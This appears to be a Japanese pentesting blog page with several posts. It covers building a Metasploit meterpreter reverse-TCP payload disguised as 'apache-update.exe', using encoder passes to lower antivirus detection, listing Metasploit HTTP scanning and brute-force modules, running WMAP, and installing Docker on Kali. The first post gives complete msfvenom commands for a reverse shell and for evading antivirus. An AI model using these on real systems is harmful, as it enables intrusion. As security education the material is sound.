shikata ga nai

Private? There is no such things.

msfvenomでアンチウィルスソフトを回避してみた

Hello there, ('ω')ノ

 

Metasploitを使用したクライアント側の攻撃で、

msfvenomで、ペイロードをつくることはできるものの。

使用したところで、アンチウイルスソフトで検出される可能性も高くて。

アンチウイルスの検出を回避するためには、エンコーダを使用する必要があって。

たとえば、shikata_ga_naiだったり。

下記のようにmsfvenomで、Remove .exe形式の単純なペイロードを生成して。

 

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=8080 -e x86/shikata_ga_nai -f exe -o /root/apache-update.exe

 

f:id:ThisIsOne:20200602083636p:plain

 

つくったペイロードは、下記のサイトへアップして検証できて。

アップロードするとアンチウイルスソフトがスキャンしてくれて。

 https://www.virustotal.com/gui/home/upload

 

f:id:ThisIsOne:20200602084147p:plain

 

結果、71のアンチウイルスソフトのうち56によって検出されたことがわかって。

この検出率だとターゲットに送信しても成功する可能性は低くて。

 

f:id:ThisIsOne:20200602084323p:plain

 

f:id:ThisIsOne:20200602084416p:plain

 

msfvenomには、エンコードプロセスを複数回繰り返すオプションもあって。

エンコーダを複数回渡すと、エンコーダがステルス的になる可能性があって。

msfvenomのoptionは以下のとおりで。

 

f:id:ThisIsOne:20200602100903p:plain


今回は、下記のようにエンコーダを5回実行してステルスを向上させることに。

 

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=8080 -e x86/opt_sub -i 5 -b '\x00' -f exe -o /root/apache-update2.exe

 

f:id:ThisIsOne:20200602085233p:plain

 

再度、ペイロードファイルをアップロードして。

すると、71のうち47のウイルス対策プログラムのみがペイロードを検出できて。

少しだけ成功への改善となったようで。

 

おそらく、ペイロードを完全に検出できなくする可能性はなくて。

ペイロードを検出不可能にするためには。

多くのエンコーダの順列や組み合わせ、反復といった試行錯誤が必要で。

ただ、エンコーダを複数反復実行すると、元のペイロードコードが損傷することも。

 

f:id:ThisIsOne:20200602085040p:plain

 

Best regards, (^^ゞ

Webアプリケーションのスキャンモジュールについてかいてみた

Hello there, ('ω')ノ

 

msfconsoleをつかって。

Webアプリケーションのスキャンに効果的な補助モジュールについて。

 

f:id:ThisIsOne:20200601193904p:plain


■cert:

 ターゲットWebアプリケーションの証明書がアクティブであるか。

 期限切れであるかを列挙するために使用できて。

 補助モジュール名:auxiliary / scanner / http / cert

 

 構成するパラメータは、以下のとおりで。

 RHOSTS:スキャンするターゲットのIPアドレスまたはIP範囲

 ※ターゲットIPアドレスのリストを含むファイルを指定することも。

 

■dir_scanner:

 ターゲットWebサーバー上のさまざまなディレクトリの存在を確認して。

 これらのディレクトリは、構成ファイルやデータベースのバックアップなど。

 いくつかの興味深い情報を明らかにする可能性があって。

 補助モジュール名:auxiliary / scanner / http / dir_scanner

 

 構成するパラメーターは、以下のとおりで。

 RHOSTS:スキャンするターゲットのIPアドレスまたはIP範囲

 

■enum_wayback:

 http://www.archive.orgは、Webサイトの履歴バージョンとデータを格納して。

 特定のWebサイトが数年前にどのように表示されたかを表示できて。

 補助モジュール名:auxiliary / scanner / http / enum_wayback

 

 構成するパラメーターは、以下のとおりで。

 RHOSTS:アーカイブを照会するターゲットドメイン名

 

■files_dir:

 Webサーバに残された可能性のあるファイルの存在をターゲットで検索して。

 これらには下記のファイルが含まれて。

  ・ソースコード

  ・バックアップファイル

  ・構成ファイル

  ・アーカイブ

  ・パスワードファイル

 補助モジュール名:auxiliary / scanner / http / files_dir

 

 構成するパラメーターは、以下のとおりで。

 RHOSTS:スキャンするターゲットのIPアドレスまたはIP範囲

 

■http_login:

 HTTPベースの認証をブルートフォースで試行して。

 Metasploitで利用可能なユーザ名とパスワードの辞書を使用して。

 補助モジュール名:auxiliary / scanner / http / http_login

 

 構成するパラメーターは、以下のとおりで。

 RHOSTS:スキャンするターゲットのIPアドレスまたはIP範囲

 

■options:

 WebサーバでTRACEやHEADなどのHTTPメソッドが有効かを確認して。

 攻撃者が攻撃ベクトルをプロットするために使用できて。

 補助モジュール名:auxiliary / scanner / http / options

 

 構成するパラメーターは、以下のとおりで。

 RHOSTS:スキャンするターゲットのIPアドレスまたはIP範囲

 

■http_version:

 ターゲットを列挙し、WebサーバのOSのバージョンを返して。

 その後、バージョン情報を使用して特定の攻撃を開始できて。

 補助モジュール名:auxiliary / scanner / http / http_version

 

 構成するパラメーターは、以下のとおりで。

 RHOSTS:スキャンするターゲットのIPアドレスまたはIP範囲

 

■http_header:

 HTTPヘッダに基づいてターゲットを列挙し、興味深い結果を返して。

 その後、バージョン情報を使用して特定の攻撃を開始できて。

 補助モジュール名:auxiliary / scanner / http / http_header

 

 構成するパラメーターは、以下のとおりで。

 RHOSTS:スキャンするターゲットのIPアドレスまたはIP範囲

 

Best regards, (^^ゞ

WMAPで脆弱性診断をやってみた

Hello there, ('ω')ノ

 

WMAPは、Webアプリケーション脆弱性スキャナーで。

プラグイン形式でMetasploitフレームワークに統合されていて。

まずは、Metasploitフレームワーク内でプラグインをロードして開始するところから。

 

f:id:ThisIsOne:20200601124549p:plain

 

下記のコマンドで、サイトを追加して。

 wmap_sites –a <site IP / host name>

 

下記のコマンドで、スキャンするターゲットのWebサイトを指定して。

 wmap_targets –t <taget URL>


f:id:ThisIsOne:20200601124355p:plain

 

次にターゲットに適用できるWMAPモジュールを確認する必要があって。

ターゲットがSSL対応でない場合は、SSL関連のテストを実行しても意味がないので。

 

下記のコマンドでWMAPモジュールを確認できて。

 wmap_run -t

 

f:id:ThisIsOne:20200601124038p:plain

 

これで、脆弱なアプリケーションへのテストに適用できるモジュールを列挙したので。

ようやく、下記のコマンドでテストの実行ができて。

 wmap_run -e

 

f:id:ThisIsOne:20200601130721p:plain

 

テストが実行されて、脆弱性が見つかるとMetasploitのデータベースに保存されて。

下記のコマンドで脆弱性を一覧表示できて。

 wmap_vulns -l

  

f:id:ThisIsOne:20200601130611p:plain

 

Best regards, (^^ゞ

Kali LinuxにDockerをインストールしてみた

Hello there, ('ω')ノ

 

まずは、おきまりのapt updateをしてから。

公式のDocker PGPキーを追加して。

次にaptを構成して、Dockerをダウンロード、インストール、更新できるようにして。

Dockerをaptに追加したら、aptをもう一度更新しておいて。

 apt update

 curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -

 echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list

 apt update

 

f:id:ThisIsOne:20200531122117p:plain

 

システムに古いバージョンのDockerがインストールされている場合は削除しておいて。

 apt remove docker docker-engine docker.io

 

f:id:ThisIsOne:20200531121209p:plain

 

これでDockerをインストールする準備ができたので。

 apt install docker-ce -y

 

f:id:ThisIsOne:20200531121402p:plain

 

最後にDockerを起動して。

 systemctl start docker

 

Dockerが実際に実際に機能するかを確認することに。

 docker run hello-world

 

f:id:ThisIsOne:20200531120627p:plain

 

Best regards, (^^ゞ

コロナを甘く見るな!ひとりひとりの自覚をもった行動で医療従事者を助けよう。

f:id:ThisIsOne:20200404115457p:plain